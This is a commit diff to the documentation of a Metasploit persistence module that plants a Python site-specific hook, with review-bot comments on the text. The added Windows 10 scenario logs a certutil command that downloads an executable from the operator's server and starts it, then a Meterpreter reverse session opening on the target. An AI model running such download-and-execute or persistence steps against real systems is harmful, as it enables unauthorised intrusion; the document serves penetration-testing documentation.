Fixes Windows persistence

Martin Sutovsky
2025-11-19 07:52:54 +01:00
parent ec8906bbd4
commit 197dbf921d
2 changed files with 36 additions and 4 deletions
@@ -5,7 +5,6 @@ This module leverages Python's startup mechanism, where some files can be automi
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Get a session
1. Do: `use multi/persistence/python_site_specific_hook`
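Review bot: The line "Example steps in this format (is also in the PR):" directly under "## Verification Steps" is leftover documentation-template text. Drop it, or replace it with a sentence specific to this module, so the section opens with the numbered steps.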
@@ -63,5 +62,38 @@ Server username: ms
### Windows 10.0.15063
```
msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/P0P_l8MTdDPpi4BXoUKxZw %TEMP%\RAKYJqUXyJK.exe & start /B %TEMP%\RAKYJqUXyJK.exe
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /P0P_l8MTdDPpi4BXoUKxZw
[*] Started reverse TCP handler on 192.168.3.7:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Users\msfuser/AppData/Local/Programs/Python/Python313/Lib/site-packages/
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.155
[*] Meterpreter session 3 opened (192.168.3.7:9999 -> 10.5.132.155:51726) at 2025-11-19 07:52:00 +0100
msf exploit(multi/persistence/python_site_specific_hook) > sessions 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : WIN10_1703_1018
OS : Windows 10 1703 (10.0 Build 15063).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10_1703_1018\msfuser
```
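Review bot: The new Windows 10.0.15063 scenario jumps from "Exploit completed, but no session was created." to "Meterpreter session 3 opened" without showing what happened on the target in between. The module relies on Python's startup mechanism, so add a line stating that Python was started on the target, and as which user, so the reader can reproduce the result. The logged hooks path `C:\Users\msfuser/AppData/Local/Programs/Python/Python313/Lib/site-packages/` mixes `\` and `/`; it works here, but normalising separators for Windows targets would make the output cleaner. The scenario also never names the file written into site-packages, which a tester needs in order to remove it afterwards.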